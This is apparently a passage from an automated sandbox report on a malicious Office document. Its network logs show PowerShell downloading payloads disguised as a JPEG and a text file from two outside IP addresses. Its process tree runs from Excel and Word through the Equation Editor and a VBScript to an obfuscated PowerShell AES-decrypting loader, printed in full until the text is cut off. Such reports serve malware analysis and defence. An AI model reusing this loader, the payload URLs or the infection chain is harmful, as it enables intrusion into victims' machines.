                Data Ascii: ng is enabled."private const L_QuickConfig_RemotingDisabledbyGP_00_ErrorMessage = "Cannot complete the request due to a
                Jul 26, 2024 08:24:44.366367102 CEST1236INData Raw: 69 00 63 00 65 00 43 00 68 00 61 00 6e 00 67 00 65 00 73 00 4e 00 65 00 65 00 64 00 65 00 64 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 32 00 20 00 3d 00 20 00 22 00 57 00 69 00 6e 00 52 00 4d 00 20 00 73 00 65 00 72 00 76 00 69 00 63 00
                Data Ascii: iceChangesNeeded_Message2 = "WinRM service is already running on this machine."private const L_QuickConfigUpdatedService


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.2249171198.46.176.133803376C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                Jul 26, 2024 08:24:48.497450113 CEST79OUTGET /Upload/vbs.jpeg HTTP/1.1
                Host: 198.46.176.133
                Connection: Keep-Alive
                Jul 26, 2024 08:24:48.981481075 CEST1236INHTTP/1.1 200 OK
                Date: Fri, 26 Jul 2024 06:24:48 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                Last-Modified: Wed, 10 Jul 2024 11:19:54 GMT
                ETag: "1d7285-61ce2d35c4b0c"
                Accept-Ranges: bytes
                Content-Length: 1929861
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: image/jpeg
                Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4A
                Jul 26, 2024 08:24:48.981637001 CEST1236INData Raw: 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04
                Data Ascii: pC.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQrXpIJI:
                Jul 26, 2024 08:24:48.981650114 CEST1236INData Raw: 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a
                Data Ascii: cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`
                Jul 26, 2024 08:24:48.981707096 CEST1236INData Raw: eb 61 9b 1b 8e 59 08 20 77 ef 81 b5 2f 89 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70
                Data Ascii: aY w/-\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+ED
                Jul 26, 2024 08:24:48.981718063 CEST1236INData Raw: 57 5c 80 2a 60 74 ef 64 8b 00 03 63 8e 98 1e 82 09 cb 79 72 9a da 0d d1 1c e0 55 27 3a a2 c1 88 8d 89 24 5f e9 81 f0 fd e8 19 a5 05 a4 6e 83 fc 39 a0 a4 35 58 1f 2b c0 4b 59 a2 d2 95 f3 59 5c 16 34 0a 11 c6 66 a4 fa 8d 1b 95 0c 5e 26 fe 12 6c 30
                Data Ascii: W\*`tdcyrU':$_n95X+KYY\4f^&l0*8<KHSQ7Y3&S\p)3v'r:/>2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF
                Jul 26, 2024 08:24:48.981729031 CEST1236INData Raw: 06 4f 0b d1 be 96 3d 34 91 ab 2a 0a 56 dd 44 fc 6f df 03 c5 b9 32 29 42 6c d7 5a ba c1 4e ab b5 4a a6 c2 a2 98 ef 27 77 c6 b3 d1 ff 00 f0 c7 fd a9 48 d4 a9 80 9b 60 45 30 1f 0c 3e a7 c1 f4 d0 68 e6 54 49 5c b0 f4 95 50 cc be d5 df ae 07 8f 50 c6
                Data Ascii: O=4*VDo2)BlZNJ'wH`E0>hTI\PP@"c4J22)Fpc,i^Hm4q`w12>8miUnq`f7m(/=EDZ}=>G7'BfHH8iV;B?{<i3nYvb}<
                Jul 26, 2024 08:24:48.982150078 CEST1236INData Raw: 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b 95 da c3 9e e7 f8 b1 d9 4b ad 3a 00 3e 7d 30 31 fc 69 61 85 16 38 c2 07 2d b8 ed 51 d2 b1 3d 0a 22 d3 b9 a2
                Data Ascii: 4n%,yEa mVV]>e7]umCKK:>}01ia8-Q="O_!;jzEcn'J]h0T5xr]UC*K)\Foi2(3++GE/&8eU[:dW)V?L(D(E7,h$`c}f )*nsgS
                Jul 26, 2024 08:24:48.982161999 CEST1236INData Raw: 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb
                Data Ascii: G-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j}0=pk`ESqHx1>~M.#z_
                Jul 26, 2024 08:24:48.982172012 CEST1236INData Raw: 3a 99 d6 dd ca ee 08 39 b5 20 96 f8 90 cc 09 cc fd 27 88 be 9f 49 a9 63 23 22 95 65 76 50 3d 41 81 1b 78 17 54 4e 01 24 f0 ff 00 0e d2 6b df 67 87 4a 49 a8 80 91 1e 22 24 60 76 95 2c c7 72 fa 4f 2d 5d af a9 cf 36 f3 69 54 ca 93 c3 b9 dc ee 49 76
                Data Ascii: :9 'Ic#"evP=AxTN$kgJI"$`v,rO-]6iTIv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v
                Jul 26, 2024 08:24:48.982184887 CEST1236INData Raw: e0 67 6d c5 09 50 73 52 24 48 68 f9 44 b3 77 1d f0 00 be 1c 8d 09 7d c4 1b e9 8e 26 91 5f 44 04 67 d4 3a 7b 93 f1 cd 08 d0 08 8b 88 5b 81 7c f7 39 63 ab 54 8e 35 8e 05 5e 79 38 19 51 46 9a 92 f1 3a 95 65 50 2c 71 cd f2 79 c1 6a 22 68 11 63 0d 61
                Data Ascii: gmPsR$HhDw}&_Dg:{[|9cT5^y8QF:eP,qyj"hca]4hv!)Q#=qr%N'IG[u{AMB<!lsR>C!6yx$XjO~k !<=o4s$,fYz,q*t*Ux+,NG*)UeUe
                Jul 26, 2024 08:24:48.986920118 CEST1236INData Raw: 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5
                Data Ascii: Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G+ZGO!"=y#_o^m Pq.by/Dh-6q'@4)*}eb-G=\r(,}if,


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.2249172192.227.225.166803376C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                Jul 26, 2024 08:24:50.890721083 CEST76OUTGET /36/RYND.txt HTTP/1.1
                Host: 192.227.225.166
                Connection: Keep-Alive
                Jul 26, 2024 08:24:51.409590960 CEST1236INHTTP/1.1 200 OK
                Date: Fri, 26 Jul 2024 06:24:51 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                Last-Modified: Thu, 25 Jul 2024 02:28:22 GMT
                ETag: "a1000-61e0926193773"
                Accept-Ranges: bytes
                Content-Length: 659456
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/plain
                Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4
                Jul 26, 2024 08:24:51.409614086 CEST1236INData Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34
                Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN
                Jul 26, 2024 08:24:51.409634113 CEST448INData Raw: 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44 62 37 51 32 4f 63 74 44
                Data Ascii: xDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd
                Jul 26, 2024 08:24:51.409646034 CEST1236INData Raw: 63 44 42 32 77 76 4e 30 62 44 37 32 51 75 4e 63 62 44 31 32 77 73 4e 45 62 44 76 32 51 72 4e 73 61 44 70 32 77 70 4e 55 61 44 6a 32 51 6f 4e 38 5a 44 64 32 77 6d 4e 6b 5a 44 58 32 51 6c 4e 4d 5a 44 52 32 77 6a 4e 30 59 44 4c 32 51 69 4e 63 59 44
                Data Ascii: cDB2wvN0bD72QuNcbD12wsNEbDv2QrNsaDp2wpNUaDj2QoN8ZDd2wmNkZDX2QlNMZDR2wjN0YDL2QiNcYDF2wgNEUD/1QfNsXD51wdNUXDz1QcN8WDt1waNkWDn1QZNMWDh1wXN0VDb1QWNcVDV0QPNsTD50wNNUTDz0QMN8SDt0wKNkSDn0QJNMSDh0wHN0RDb0QGNcRDV0wENERDP0QDNsQDJ0wBNUMDOzwyMgMDFzggM8LD8
                Jul 26, 2024 08:24:51.409657955 CEST1236INData Raw: 67 61 4e 67 57 44 6d 31 41 5a 4e 49 57 44 67 31 67 58 4e 77 56 44 61 31 41 57 4e 59 56 44 55 31 67 55 4e 41 56 44 4f 31 41 54 4e 6f 55 44 49 31 67 52 4e 51 55 44 43 31 41 41 4e 34 54 44 38 30 67 4f 4e 67 54 44 32 30 41 4e 4e 49 54 44 77 30 67 4c
                Data Ascii: gaNgWDm1AZNIWDg1gXNwVDa1AWNYVDU1gUNAVDO1ATNoUDI1gRNQUDC1AAN4TD80gONgTD20ANNITDw0gLNwSDq0AKNYSDk0gINASDe0AHNoRDY0gFNQRDS0AEN4QDM0gCNgQDG0ABNIQDAzg/MwPD6zA+MYPD0zg8MAPDuzA7MoODozg5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvMoLD4ygtM
                Jul 26, 2024 08:24:51.409668922 CEST1236INData Raw: 4f 44 6c 7a 41 35 4d 4d 4f 44 69 7a 51 34 4d 41 4f 44 66 7a 67 33 4d 30 4e 44 63 7a 77 32 4d 6f 4e 44 5a 7a 41 32 4d 63 4e 44 57 7a 51 31 4d 51 4e 44 54 7a 67 30 4d 45 4e 44 51 7a 77 7a 4d 34 4d 44 4e 7a 41 7a 4d 73 4d 44 4b 7a 51 79 4d 67 41 44
                Data Ascii: ODlzA5MMODizQ4MAODfzg3M0NDczw2MoNDZzA2McNDWzQ1MQNDTzg0MENDQzwzM4MDNzAzMsMDKzQyMgADvwQLMsCDpwwJMUCDjwQIM8BDdwwGMkBDXwQFMMBDRwwDM0ADLwQCMcADFwwAMEAAACAKAFAKA/w/P0/D7/Q+Pc/D1/w8PE/Dv/Q7Ps+Dp/w5PU+Dj/Q4P89Dd/w2Pk9DX/Q1PM9DR/wzP08DL/QyPc8DF/wwPE4D/
                Jul 26, 2024 08:24:51.409682035 CEST1236INData Raw: 51 41 50 78 7a 6a 35 36 51 74 4f 46 68 44 79 32 30 6e 4e 4b 56 7a 6b 31 41 59 4e 68 56 6a 55 31 6b 53 4e 56 51 54 72 30 59 4b 4e 66 53 44 6d 78 51 46 41 41 41 41 58 41 55 41 55 41 41 41 41 2b 38 6b 50 49 35 54 45 2b 6b 51 50 55 6b 6a 36 35 4d 65
                Data Ascii: QAPxzj56QtOFhDy20nNKVzk1AYNhVjU1kSNVQTr0YKNfSDmxQFAAAAXAUAUAAAA+8kPI5TE+kQPUkj65MeOsmDpxEdMlBAAAACAFAEA/o9Pe9zR+QrPx0Dj9EBPtyTj8ozO7qjG5kTOnkTF44JOshDX4ElNuZTX1olMBET+xMeMNHjswgHAAAAQAUAMAAAA/whPA6TQ9I4OFgT038+NQfDi3k3NeYjy2AsN2Zjb2kRNxVDL1URN
                Jul 26, 2024 08:24:51.409841061 CEST1236INData Raw: 70 7a 46 36 77 51 4f 2f 6e 44 33 35 34 62 4f 42 67 44 75 34 63 47 4f 4b 68 6a 4e 33 55 71 4e 52 56 6a 77 31 4d 61 4e 45 57 54 57 7a 38 75 4d 43 4c 44 6d 79 34 59 4d 4f 48 44 70 78 51 59 4d 52 42 44 2b 77 77 47 4d 6b 42 41 41 41 41 48 41 45 41 4d
                Data Ascii: pzF6wQO/nD354bOBgDu4cGOKhjN3UqNRVjw1MaNEWTWz8uMCLDmy4YMOHDpxQYMRBD+wwGMkBAAAAHAEAMAAAgPz6zq+sQPp3jz9QcPH2TL9cBP5xjR8MwO1uzq7wjOcqDQ5EcOfmjg58UOzkjA4QNOLhzL4YwNdfzX3E0NYYz72AoNiZzQ2kjNjYDB10cNWVjR1sTNUQz20wLNwQDAzE+MFPThz8mMpLD2yMsMQKjLycSMcFTV
                Jul 26, 2024 08:24:51.409852982 CEST1236INData Raw: 38 46 50 59 79 6a 66 38 73 47 50 52 78 6a 50 38 51 79 4f 32 73 44 4d 36 34 5a 4f 5a 69 54 34 34 6f 4e 4f 2f 69 54 75 34 49 4c 4f 6b 69 54 6d 34 49 4a 4f 6c 68 44 54 33 6f 71 4e 6a 55 44 6f 31 4d 59 4e 37 56 6a 63 31 59 45 4e 45 54 7a 63 30 73 47
                Data Ascii: 8FPYyjf8sGPRxjP8QyO2sDM64ZOZiT44oNO/iTu4ILOkiTm4IJOlhDT3oqNjUDo1MYN7Vjc1YENETzc0sGNYMD4xUIAAAAUAQAUA8zt/c6Pi9zI+AaPh3zx9oVPP1TP9czOWkDe48MOMeDb2AuN/aDd2gmNUZjT2QkN5UTt10aNlWjl1wYNBWTT1UBNOMz0zU5M5NTZzkhM1LDuyInMYJTMx0fM2GTrxwZM3FzXxcVMLFTOxASM
                Jul 26, 2024 08:24:51.409863949 CEST1236INData Raw: 6a 44 31 34 45 4b 4f 55 65 6a 35 33 34 39 4e 56 66 44 6d 33 38 34 4e 31 5a 54 2f 32 45 76 4e 4d 57 44 36 30 45 4e 4e 46 54 44 6c 30 34 49 4e 48 53 54 65 30 6b 46 4e 39 51 54 4d 30 41 43 4e 46 4d 7a 39 7a 30 2b 4d 6a 50 7a 78 7a 4d 37 4d 4c 4f 44
                Data Ascii: jD14EKOUej5349NVfDm384N1ZT/2EvNMWD60ENNFTDl04INHSTe0kFN9QTM0ACNFMz9z0+MjPzxzM7MLODczo2McNzOzsyMmMDFwcLAAAAXAMAoAAAA/M5PE5Tt+wFP5yzY4wiNwZDa2ImNKVTqz09MMLTyy4lMZJTQxcfMXHzhxYDM1DjywEHMfBzVAAAAABwAQCAAA8z3/gyPc8jC+UuPb7zy+YsP+6jj+koPE6De+ElPM5zR
                Jul 26, 2024 08:24:51.414526939 CEST1236INData Raw: 30 54 4d 33 45 54 4d 78 73 53 4d 6c 41 6a 38 77 6b 4f 4d 5a 44 54 79 77 6b 4c 4d 76 43 54 70 77 38 4a 4d 61 43 54 6b 77 55 49 4d 39 42 54 64 77 30 47 4d 6d 42 7a 58 77 67 46 4d 52 42 6a 53 77 4d 45 4d 38 41 6a 4e 77 41 44 4d 71 41 44 4a 77 34 42
                Data Ascii: 0TM3ETMxsSMlAj8wkOMZDTywkLMvCTpw8JMaCTkwUIM9BTdw0GMmBzXwgFMRBjSwMEM8AjNwADMqADJw4BAAEAiAMAUA8j//c/Ps/z4/08Po+zo/03P49Dc/o2Ph9zO/QxPO4T/+UvPG7Tu+ArPh6Tl+onPu4TE9ofPr3j49cdPK3Tw9sYPE2Td94SPm0TH8sIPAyTZ8cFPExzE8MwO9vT57A9OKvjs745OWujT7g0OwsjC6kvO


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:02:24:12
                Start date:26/07/2024
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Imagebase:0x13fae0000
                File size:28'253'536 bytes
                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:3
                Start time:02:24:35
                Start date:26/07/2024
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                Imagebase:0x13f070000
                File size:1'423'704 bytes
                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:7
                Start time:02:24:42
                Start date:26/07/2024
                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Wow64 process (32bit):true
                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Imagebase:0x400000
                File size:543'304 bytes
                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:8
                Start time:02:24:44
                Start date:26/07/2024
                Path:C:\Windows\SysWOW64\wscript.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS"
                Imagebase:0x5e0000
                File size:141'824 bytes
                MD5 hash:979D74799EA6C8B8167869A68DF5204A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:9
                Start time:02:24:44
                Start date:26/07/2024
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/